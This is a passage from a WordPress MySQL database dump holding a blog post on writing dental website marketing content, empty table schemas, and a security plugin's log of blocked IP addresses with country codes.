Website','','inherit','closed','closed','','34-revision-v1','','','2017-10-26 09:17:59','2017-10-26 09:17:59','',34,'http://www.dogstardesign.co.uk/34-revision-v1',0,'revision','',0),(93,1,'2020-10-20 15:23:56','2020-10-20 15:23:56','<h2><img class=\"aligncenter wp-image-94\" src=\"http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/online-marketing-1246457_1920.jpg\" alt=\"\" width=\"1500\" height=\"1227\" /></h2>\r\n<h2><a href=\"http://www.dogstardesign.co.uk/what-is-word-of-mouth-marketing\">How to Write Dental Content That Entices Visitors to Call</a></h2>\r\n<h2>1 .Get Inside the Mind of Your Website Visitor</h2>\r\n<blockquote>Imagine you are your average potential customer.</blockquote>\r\n<strong>They have got as far as viewing your page, so they are likely to be at least curious about the services you offer.</strong>\r\n\r\nThey are likely to know what they need help with, but they don’t necessarily know exactly what services are on offer.\r\n\r\nIf you had a dental health issue, but you knew no dental terminology, how would you ask for help?\r\n<h3>2. Answer Their Dental Questions</h3>\r\n<blockquote>Think about your service as the fulfilment of a need – usually potential customers will search from the perspective of trying to solve a problem.</blockquote>\r\nThey want to be <strong>informed</strong> and <strong>encouraged</strong>.\r\n\r\nAim to create content that answers the questions that the average person has about their dental health and that the average patient asks their dentist.\r\n<h3>3. Write with Empathy</h3>\r\n<img class=\"wp-image-95 alignright\" src=\"http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/writing-828911_1920.jpg\" alt=\"\" width=\"320\" height=\"213\" />\r\n\r\nWhat might seem simple to you, as someone experienced in your field, might be dauntingly\r\n\r\ncomplex to someone suffering from an uncomfortable or embarrassing issue.\r\n\r\n<strong style=\"font-size: 1rem;\">Break things down into simple steps that anyone can follow.</strong>\r\n\r\nRemind them that a dentist will not be shocked by their problem and that their issue is probably minor and definitely fixable.\r\n\r\nRemember that many people are afraid of going to the dentist.\r\n\r\nTake an <strong>approachable</strong> and <strong>friendly</strong> tone and choose words that do not sound too clinical or mechanical.\r\n\r\nWhen describing procedures, avoid using words that make either the dental tools or the dental issue sound unappealing to a nervous client.\r\n\r\n<a href=\"https://www.semrush.com/blog/how-to-define-your-tone-of-voice/\" target=\"_blank\" rel=\"noopener\">Read more </a>about perfecting your company\'s tone of voice.\r\n<h3>4. <strong>Inspiration: Blog Ideas for Dental Websites</strong></h3>\r\nThere are many excellent dental blogs and business sites out there, so why not take a look for some inspiration. There is no shame in imitating a formula that works. Here are some great examples.\r\n<ul>\r\n <li>Why Invisalign is So Popular Amongst Adults: <a href=\"https://www.finedentistryorlando.com/Blog/Post/Why-Invisalign-is-Popular-for-Adults\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>How Successful are Veneers?: <a href=\"https://www.docshop.com/education/dental/cosmetic-dentistry/porcelain-veneers\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Importance of Oral Health: <a href=\"https://www.dentalhealth.org/healthysmile\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Many Advantages of Dental Implants: <a href=\"https://thegentledental.co.uk/dental-implants/what-are-the-advantages-of-dental-implants\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Consequences of Missing Teeth: <a href=\"https://www.designerforsmiles.com/dental-implants/consequences-of-missing-teeth/\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>Dental Implant Risks: <a href=\"https://www.news-medical.net/health/Dental-Implant-Risks.aspx\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>Gum Disease & Implants: <a href=\"https://dorsetdentalimplants.com/dental-implants/gum-disease-dental-implants\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n</ul>','How to Write Dental Content That Entices Visitors to Call','','publish','closed','closed','','how-to-write-dental-content-that-entices-visitors-to-call','','','2020-10-20 15:26:33','2020-10-20 15:26:33','',0,'http://www.dogstardesign.co.uk/?p=93',0,'post','',0),(94,1,'2020-10-20 15:19:54','2020-10-20 15:19:54','','online-marketing-1246457_1920','','inherit','closed','closed','','online-marketing-1246457_1920','','','2020-10-20 15:19:54','2020-10-20 15:19:54','',93,'http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/online-marketing-1246457_1920.jpg',0,'attachment','image/jpeg',0),(95,1,'2020-10-20 15:22:56','2020-10-20 15:22:56','','writing-828911_1920','','inherit','closed','closed','','writing-828911_1920','','','2020-10-20 15:22:56','2020-10-20 15:22:56','',93,'http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/writing-828911_1920.jpg',0,'attachment','image/jpeg',0),(96,1,'2020-10-20 15:23:56','2020-10-20 15:23:56','<h2><img class=\"aligncenter wp-image-94\" src=\"http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/online-marketing-1246457_1920.jpg\" alt=\"\" width=\"1500\" height=\"1227\" /></h2>\r\n<h2><a href=\"http://www.dogstardesign.co.uk/what-is-word-of-mouth-marketing\">How to Write Dental Content That Entices Visitors to Call</a></h2>\r\n<h2>1 .Get Inside the Mind of Your Website Visitor</h2>\r\n<blockquote>Imagine you are your average potential customer.</blockquote>\r\n<strong>They have got as far as viewing your page, so they are likely to be at least curious about the services you offer.</strong>\r\n\r\nThey are likely to know what they need help with, but they don’t necessarily know exactly what services are on offer.\r\n\r\nIf you had a dental health issue, but you knew no dental terminology, how would you ask for help?\r\n<h3>2. Answer Their Dental Questions</h3>\r\n<blockquote>Think about your service as the fulfilment of a need – usually potential customers will search from the perspective of trying to solve a problem.</blockquote>\r\nThey want to be <strong>informed</strong> and <strong>encouraged</strong>.\r\n\r\nAim to create content that answers the questions that the average person has about their dental health and that the average patient asks their dentist.\r\n<h3>3. Write with Empathy</h3>\r\n<img class=\"wp-image-95 alignright\" src=\"http://www.dogstardesign.co.uk/wp-content/uploads/2020/10/writing-828911_1920.jpg\" alt=\"\" width=\"320\" height=\"213\" />\r\n\r\nWhat might seem simple to you, as someone experienced in your field, might be dauntingly\r\n\r\ncomplex to someone suffering from an uncomfortable or embarrassing issue.\r\n\r\n<strong style=\"font-size: 1rem;\">Break things down into simple steps that anyone can follow.</strong>\r\n\r\nRemind them that a dentist will not be shocked by their problem and that their issue is probably minor and definitely fixable.\r\n\r\nRemember that many people are afraid of going to the dentist.\r\n\r\nTake an <strong>approachable</strong> and <strong>friendly</strong> tone and choose words that do not sound too clinical or mechanical.\r\n\r\nWhen describing procedures, avoid using words that make either the dental tools or the dental issue sound unappealing to a nervous client.\r\n\r\n<a href=\"https://www.semrush.com/blog/how-to-define-your-tone-of-voice/\" target=\"_blank\" rel=\"noopener\">Read more </a>about perfecting your company\'s tone of voice.\r\n<h3>4. <strong>Inspiration: Blog Ideas for Dental Websites</strong></h3>\r\nThere are many excellent dental blogs and business sites out there, so why not take a look for some inspiration. There is no shame in imitating a formula that works. Here are some great examples.\r\n<ul>\r\n <li>Why Invisalign is So Popular Amongst Adults: <a href=\"https://www.finedentistryorlando.com/Blog/Post/Why-Invisalign-is-Popular-for-Adults\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>How Successful are Veneers?: <a href=\"https://www.docshop.com/education/dental/cosmetic-dentistry/porcelain-veneers\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Importance of Oral Health: <a href=\"https://www.dentalhealth.org/healthysmile\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Many Advantages of Dental Implants: <a href=\"https://thegentledental.co.uk/dental-implants/what-are-the-advantages-of-dental-implants\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>The Consequences of Missing Teeth: <a href=\"https://www.designerforsmiles.com/dental-implants/consequences-of-missing-teeth/\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>Dental Implant Risks: <a href=\"https://www.news-medical.net/health/Dental-Implant-Risks.aspx\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n <li>Gum Disease & Implants: <a href=\"https://dorsetdentalimplants.com/dental-implants/gum-disease-dental-implants\" target=\"_blank\" rel=\"noopener\">Read</a>.</li>\r\n</ul>','How to Write Dental Content That Entices Visitors to Call','','inherit','closed','closed','','93-revision-v1','','','2020-10-20 15:23:56','2020-10-20 15:23:56','',93,'http://www.dogstardesign.co.uk/93-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblockediplog`
--
DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`countryCode` varchar(2) NOT NULL,
`blockCount` int(10) unsigned NOT NULL DEFAULT 0,
`unixday` int(10) unsigned NOT NULL,
`blockType` varchar(50) NOT NULL DEFAULT 'generic',
PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblockediplog`
--
LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��tK�','CN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n','KR',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��;u','TR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��_��','RU',4,18874,'waf'),('\0\0\0\0\0\0\0\0\0\0���h','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���b','AU',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��lt%','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��E2','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��E2','NL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��E2','NL',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���x','RO',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��M\'f','GB',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�+','RU',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��e�8','RU',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���H�','FR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',11,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',49,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���>L','RU',26,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���>�','RU',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��)%�','RU',2,18867,'waf'),('\0\0\0\0\0\0\0\0\0\0���','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���F�','CN',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���F�','CN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���F�','CN',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���F�','CN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�','SG',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���:�','SG',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���5�','HK',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ғ�','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r$n�','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r$n�','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r$n�','FR',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r$n�','FR',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ��','IE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ��','IE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rJ��','IE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rL��','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\rQ(','NL',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r^�,','NL',2,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�S�','SG',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r���','SG',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�\0P','SG',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�9','IN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��\r�9','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���W�','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','BH',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��k','IN',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��k','IN',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0����','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','SG',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���d','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Uy\\','US',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��Uy\\','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��Uy\\','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��Z��','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��^�w','US',6,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��n','US',1,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0���1','FR',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0����','FR',2,18882,'waf'),('\0\0\0\0\0\0\0\0\0\0��P8','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��P8','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��X&�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��X&�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��^x�','NL',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��^��','US',2,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��a��','NL',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ca�','HK',3,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���_j','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��2M_','AU',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��H8�','VN',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��H8�','VN',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��pNH','ID',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��|�','AU',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���7','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��/\0$','BA',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���_','RU',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���_�','RU',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���_�','RU',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���i','GB',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���$O','FR',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���$O','FR',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0���$O','FR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',3,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���O�','TR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���)','NL',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���)','NL',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���7]','CY',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���7]','CY',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���7]','CY',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"@�f','KR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"AZ','CH',1,18866,'waf'),('\0\0\0\0\0\0\0\0\0\0��\"C��','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"DaF','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"E�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"P�R','TW',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�n','TW',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"Q�n','TW',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"V��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"V��','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"V��','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"W#�','SG',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"]$d','IN',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"a��','JP',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"{3','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}6�','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}6�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"}6�','US',1,18884,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',2,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"���','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��q','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��q','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�+�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�i*','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','IN',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�v','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��8','GB',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��#���','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�ޥ','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��','BE',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ÇC','BE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�D','BE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�D','BE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��#Ɖ�','DE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�Z','JP',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�Y','BE',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��C','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��C','IN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ժ�','SG',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��#ݵ�